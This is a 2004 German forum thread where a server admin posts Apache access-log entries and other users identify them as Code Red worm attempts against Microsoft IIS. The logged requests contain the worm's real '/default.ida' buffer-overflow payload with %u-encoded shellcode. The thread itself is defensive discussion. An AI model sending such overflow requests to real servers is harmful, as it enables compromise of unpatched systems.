Omg was ist das :?

Post by **format-c** » 2004-01-09 15:44

81.248.14.81 - - [08/Jan/2004:23:22:41 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 287
81.248.14.81 - - [09/Jan/2004:01:24:59 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 287
81.49.209.207 - - [09/Jan/2004:05:15:05 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 287
212.202.43.165 - - [09/Jan/2004:07:27:26 +0100] "GET /mod_ssl:error:HTTP-request HTTP/1.0" 400 562

da habsch ich meiner access log in für httpd gefunden

kann mir einer sagne was das is hab das jetzt schon paar mal in meiner log und auch auf nen andern server

for help währe ich dankbar

Post by **chris76** » 2004-01-09 15:46

Ich würde mal sagen da hat jemad versucht einen Buffer overflow zu verursachen

Post by **format-c** » 2004-01-09 15:47

kann mir das was anhaben :?

Post by **captaincrunch** » 2004-01-09 15:48

http://www.thesitewizard.com/news/coderediiworm.shtml

http://www.linuxplanet.com/linuxplanet/opinions/3647/1/

Post by **format-c** » 2004-01-09 15:51

hm wenn ich dem englischen mächtig bin soll das heissen nein :)

nur windows webserver oda

Post by **captaincrunch** » 2004-01-09 15:57

Du kannst gerne auch nach deutschsprachigen Google-Einträgen über Code Red suchen. ;)

Post by **chris76** » 2004-01-09 15:57

http://www.google.de/search?sourceid=na ... e+red+wurm

Post by **format-c** » 2004-01-09 15:58

Betroffen sind die Microsoft Webserver von NT 4.0 und Windows 2000.

schön :)

da kann ich ja beruhigt mein newbie dasein leben :9

Post by **mtealc** » 2004-01-10 00:21

die webserver müßten doch schon alle gepatch sein oder gibts da immer noch ein paar windoff-admins die es veräumt haben?
:lol:

Post by **Joe User** » 2004-01-10 09:42

MTealc wrote:die webserver müßten doch schon alle gepatch sein oder gibts da immer noch ein paar windoff-admins die es veräumt haben?
:lol:

Wenn's denn nur ein paar wären...

RootForum Community

Omg was ist das :?

Omg was ist das :?

Re: Omg was ist das :?

Re: Omg was ist das :?

Re: Omg was ist das :?

Re: Omg was ist das :?

Re: Omg was ist das :?

Re: Omg was ist das :?

Re: Omg was ist das :?

Re: Omg was ist das :?

Re: Omg was ist das :?